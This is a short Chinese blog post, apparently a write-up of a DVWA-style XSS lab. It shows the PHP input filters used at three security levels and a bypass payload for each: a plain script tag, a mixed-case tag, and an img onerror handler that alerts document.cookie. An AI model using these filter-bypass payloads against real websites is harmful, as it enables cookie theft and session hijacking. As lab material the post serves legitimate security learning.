本文探讨了不同安全级别下XSS攻击的防御措施及绕过方法,包括使用小写标签、替换标签和正则表达式过滤等手段,并提出了一些有效的绕过策略。
low
无验证,直接注入
<script>alert(document.cookie)</script>medium
查看源码发现过滤了<scrpit>标签
$name = str_replace( '<script>', '', $_GET[ 'name' ] ); 绕过思路:大写
<Script>alert(document.cookie)</script>high
查看源码,可发现用正则过滤了
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] ); 绕过思路:标签很多,换一种标签即可。这里用img
<img src=1 onerror=alert(document.cookie)>【这又是一个梗,感觉可以从正面绕过这个正则,路过的朋友指教一下,thank you!】
注:谷歌浏览器默认配置是不会执行alert的,可换其他浏览器测试。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
